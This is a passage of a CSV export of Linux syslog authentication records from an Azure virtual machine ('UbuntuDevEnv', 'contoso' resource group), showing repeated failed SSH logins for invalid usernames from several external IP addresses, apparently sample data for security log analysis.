+11586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:04,UbuntuDevEnv,2019-06-26 00:36:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,74803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:06,UbuntuDevEnv,2019-06-26 00:36:06,auth,UbuntuDevEnv,info,Invalid user test1 from 118.222.146.186 port 48378,74819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,118.222.146.1,48378,,
+11588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:06,UbuntuDevEnv,2019-06-26 00:36:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,74819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:06,UbuntuDevEnv,2019-06-26 00:36:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:06,UbuntuDevEnv,2019-06-26 00:36:06,auth,UbuntuDevEnv,info,Failed password for invalid user thibault from 104.248.121.67 port 40813 ssh2,74803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,thibault,104.248.121.6,40813,,
+11591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:06,UbuntuDevEnv,2019-06-26 00:36:06,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 40813:11: Bye Bye [preauth],74803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,40813,,
+11592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:06,UbuntuDevEnv,2019-06-26 00:36:06,auth,UbuntuDevEnv,info,Disconnected from invalid user thibault 104.248.121.67 port 40813 [preauth],74803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,thibault,104.248.121.6,40813,,
+11593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:08,UbuntuDevEnv,2019-06-26 00:36:08,auth,UbuntuDevEnv,info,Failed password for invalid user test1 from 118.222.146.186 port 48378 ssh2,74819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,118.222.146.1,48378,,
+11594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:08,UbuntuDevEnv,2019-06-26 00:36:08,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 48378:11: Bye Bye [preauth],74819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,48378,,
+11595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:08,UbuntuDevEnv,2019-06-26 00:36:08,auth,UbuntuDevEnv,info,Disconnected from invalid user test1 118.222.146.186 port 48378 [preauth],74819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,118.222.146.1,48378,,
+11596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:09,UbuntuDevEnv,2019-06-26 00:36:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,74829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:09,UbuntuDevEnv,2019-06-26 00:36:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,74829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:09,UbuntuDevEnv,2019-06-26 00:36:08,auth,UbuntuDevEnv,info,Invalid user pgadmin from 186.31.116.78 port 33205,74829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgadmin,186.31.116.7,33205,,
+11599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:10,UbuntuDevEnv,2019-06-26 00:36:10,auth,UbuntuDevEnv,info,Failed password for invalid user pgadmin from 186.31.116.78 port 33205 ssh2,74829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgadmin,186.31.116.7,33205,,
+11600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:11,UbuntuDevEnv,2019-06-26 00:36:10,auth,UbuntuDevEnv,info,Disconnected from invalid user pgadmin 186.31.116.78 port 33205 [preauth],74829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgadmin,186.31.116.7,33205,,
+11601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:11,UbuntuDevEnv,2019-06-26 00:36:10,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 33205:11: Bye Bye [preauth],74829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,33205,,
+11602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:47,UbuntuDevEnv,2019-06-26 00:36:46,auth,UbuntuDevEnv,info,Disconnected from 139.59.44.60 port 44430 [preauth],74971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.59.44.6,44430,,
+11603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:36:47,UbuntuDevEnv,2019-06-26 00:36:46,auth,UbuntuDevEnv,info,Received disconnect from 139.59.44.60 port 44430:11: Bye Bye [preauth],74971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.59.44.6,44430,,
+11604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:30,UbuntuDevEnv,2019-06-26 00:37:29,auth,UbuntuDevEnv,info,Invalid user sysadmin from 104.248.121.67 port 49251,75125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadmin,104.248.121.6,49251,,
+11605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:30,UbuntuDevEnv,2019-06-26 00:37:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,75125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:30,UbuntuDevEnv,2019-06-26 00:37:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:32,UbuntuDevEnv,2019-06-26 00:37:31,auth,UbuntuDevEnv,info,Failed password for invalid user sysadmin from 104.248.121.67 port 49251 ssh2,75125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadmin,104.248.121.6,49251,,
+11608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:32,UbuntuDevEnv,2019-06-26 00:37:31,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 49251:11: Bye Bye [preauth],75125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,49251,,
+11609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:32,UbuntuDevEnv,2019-06-26 00:37:31,auth,UbuntuDevEnv,info,Disconnected from invalid user sysadmin 104.248.121.67 port 49251 [preauth],75125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadmin,104.248.121.6,49251,,
+11610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:48,UbuntuDevEnv,2019-06-26 00:37:48,auth,UbuntuDevEnv,info,Invalid user bwanjiru from 118.222.146.186 port 36908,75188,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwanjiru,118.222.146.1,36908,,
+11611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:48,UbuntuDevEnv,2019-06-26 00:37:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75188,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:48,UbuntuDevEnv,2019-06-26 00:37:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,75188,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:50,UbuntuDevEnv,2019-06-26 00:37:50,auth,UbuntuDevEnv,info,Failed password for invalid user bwanjiru from 118.222.146.186 port 36908 ssh2,75188,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwanjiru,118.222.146.1,36908,,
+11614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:51,UbuntuDevEnv,2019-06-26 00:37:50,auth,UbuntuDevEnv,info,Disconnected from invalid user bwanjiru 118.222.146.186 port 36908 [preauth],75188,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwanjiru,118.222.146.1,36908,,
+11615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:37:51,UbuntuDevEnv,2019-06-26 00:37:50,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 36908:11: Bye Bye [preauth],75188,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,36908,,
+11616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:01,UbuntuDevEnv,2019-06-26 00:38:00,auth,UbuntuDevEnv,info,Invalid user murai2 from 131.100.219.3 port 35014,75234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai2,131.100.219.3,35014,,
+11617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:01,UbuntuDevEnv,2019-06-26 00:38:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:01,UbuntuDevEnv,2019-06-26 00:38:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,75234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:03,UbuntuDevEnv,2019-06-26 00:38:02,auth,UbuntuDevEnv,info,Failed password for invalid user murai2 from 131.100.219.3 port 35014 ssh2,75234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai2,131.100.219.3,35014,,
+11620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:03,UbuntuDevEnv,2019-06-26 00:38:02,auth,UbuntuDevEnv,info,Invalid user artifactory from 186.31.116.78 port 42007,75241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,artifactory,186.31.116.7,42007,,
+11621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:03,UbuntuDevEnv,2019-06-26 00:38:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,75241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:03,UbuntuDevEnv,2019-06-26 00:38:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:03,UbuntuDevEnv,2019-06-26 00:38:02,auth,UbuntuDevEnv,info,Disconnected from invalid user murai2 131.100.219.3 port 35014 [preauth],75234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai2,131.100.219.3,35014,,
+11624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:03,UbuntuDevEnv,2019-06-26 00:38:02,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 35014:11: Bye Bye [preauth],75234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,35014,,
+11625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:05,UbuntuDevEnv,2019-06-26 00:38:04,auth,UbuntuDevEnv,info,Failed password for invalid user artifactory from 186.31.116.78 port 42007 ssh2,75241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,artifactory,186.31.116.7,42007,,
+11626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:05,UbuntuDevEnv,2019-06-26 00:38:04,auth,UbuntuDevEnv,info,Disconnected from invalid user artifactory 186.31.116.78 port 42007 [preauth],75241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,artifactory,186.31.116.7,42007,,
+11627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:05,UbuntuDevEnv,2019-06-26 00:38:04,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 42007:11: Bye Bye [preauth],75241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,42007,,
+11628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:54,UbuntuDevEnv,2019-06-26 00:38:54,auth,UbuntuDevEnv,info,Invalid user rory from 104.248.121.67 port 57689,75426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rory,104.248.121.6,57689,,
+11629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:54,UbuntuDevEnv,2019-06-26 00:38:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:54,UbuntuDevEnv,2019-06-26 00:38:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,75426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:56,UbuntuDevEnv,2019-06-26 00:38:56,auth,UbuntuDevEnv,info,Failed password for invalid user rory from 104.248.121.67 port 57689 ssh2,75426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rory,104.248.121.6,57689,,
+11632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:56,UbuntuDevEnv,2019-06-26 00:38:56,auth,UbuntuDevEnv,info,Disconnected from invalid user rory 104.248.121.67 port 57689 [preauth],75426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rory,104.248.121.6,57689,,
+11633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:38:56,UbuntuDevEnv,2019-06-26 00:38:56,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 57689:11: Bye Bye [preauth],75426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,57689,,
+11634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:27,UbuntuDevEnv,2019-06-26 00:39:27,auth,UbuntuDevEnv,info,Invalid user opentsp from 118.222.146.186 port 53670,75542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,opentsp,118.222.146.1,53670,,
+11635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:27,UbuntuDevEnv,2019-06-26 00:39:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:27,UbuntuDevEnv,2019-06-26 00:39:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,75542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:30,UbuntuDevEnv,2019-06-26 00:39:29,auth,UbuntuDevEnv,info,Failed password for invalid user opentsp from 118.222.146.186 port 53670 ssh2,75542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,opentsp,118.222.146.1,53670,,
+11638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:30,UbuntuDevEnv,2019-06-26 00:39:29,auth,UbuntuDevEnv,info,Disconnected from invalid user opentsp 118.222.146.186 port 53670 [preauth],75542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,opentsp,118.222.146.1,53670,,
+11639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:30,UbuntuDevEnv,2019-06-26 00:39:29,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 53670:11: Bye Bye [preauth],75542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,53670,,
+11640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:57,UbuntuDevEnv,2019-06-26 00:39:56,auth,UbuntuDevEnv,info,Invalid user sysadmin from 186.31.116.78 port 50809,75649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadmin,186.31.116.7,50809,,
+11641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:57,UbuntuDevEnv,2019-06-26 00:39:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,75649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:57,UbuntuDevEnv,2019-06-26 00:39:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:58,UbuntuDevEnv,2019-06-26 00:39:58,auth,UbuntuDevEnv,info,Failed password for invalid user sysadmin from 186.31.116.78 port 50809 ssh2,75649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadmin,186.31.116.7,50809,,
+11644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:58,UbuntuDevEnv,2019-06-26 00:39:58,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 50809:11: Bye Bye [preauth],75649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,50809,,
+11645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:39:58,UbuntuDevEnv,2019-06-26 00:39:58,auth,UbuntuDevEnv,info,Disconnected from invalid user sysadmin 186.31.116.78 port 50809 [preauth],75649,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadmin,186.31.116.7,50809,,
